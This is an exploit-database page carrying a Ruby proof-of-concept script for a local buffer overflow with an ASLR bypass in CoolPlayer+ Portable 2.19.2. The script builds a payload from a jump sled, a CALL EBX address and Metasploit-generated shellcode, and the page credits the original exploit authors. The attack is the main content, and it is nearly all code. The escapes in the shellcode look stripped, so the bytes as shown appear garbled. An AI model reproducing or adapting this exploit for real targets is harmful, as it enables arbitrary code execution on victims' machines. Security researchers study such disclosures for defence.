CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass 2

2012-08-06 / 2015-12-26
Credit: Blake and Dhruval
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/ruby # Exploit for CoolPlayer+ Portable 2.19.2 # # Based on exploit by Blake and Dhruval. # Vulnerability found by Securityxxxpert # Original: http://www.exploit-db.com/exploits/20262/ # # This one by Robert Larsen <robert@the-playground.dk> # Lots of room for shellcode as opposed to original exploit. # Shellcode created with: # msfpayload windows/exec CMD=calc R | msfencode -b 'x00x0ax0c' SHELLCODE= "xdaxd6xd9x74x24xf4xb8x3axbdx65xf7x5ex31xc9" + "xb1x32x31x46x17x03x46x17x83xd4x41x87x02xd4" + "x52xc1xedx24xa3xb2x64xc1x92xe0x13x82x87x34" + "x57xc6x2bxbex35xf2xb8xb2x91xf5x09x78xc4x38" + "x89x4cxc8x96x49xcexb4xe4x9dx30x84x27xd0x31" + "xc1x55x1bx63x9ax12x8ex94xafx66x13x94x7fxed" + "x2bxeexfax31xdfx44x04x61x70xd2x4ex99xfaxbc" + "x6ex98x2fxdfx53xd3x44x14x27xe2x8cx64xc8xd5" + "xf0x2bxf7xdaxfcx32x3fxdcx1ex41x4bx1fxa2x52" + "x88x62x78xd6x0dxc4x0bx40xf6xf5xd8x17x7dxf9" + "x95x5cxd9x1dx2bxb0x51x19xa0x37xb6xa8xf2x13" + "x12xf1xa1x3ax03x5fx07x42x53x07xf8xe6x1fxa5" + "xedx91x7dxa3xf0x10xf8x8axf3x2ax03xbcx9bx1b" + "x88x53xdbxa3x5bx10x13xeexc6x30xbcxb7x92x01" + "xa1x47x49x45xdcxcbx78x35x1bxd3x08x30x67x53" + "xe0x48xf8x36x06xffxf9x12x65x9ex69xfex6a" payload = "xebx4e" * (232 / 2) + #JMP 80 "x5dxecxf8x77" + #CALL EBX "x90x90x90x90" + #Junk SHELLCODE puts payload

References:

http://www.exploit-db.com/exploits/20262/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top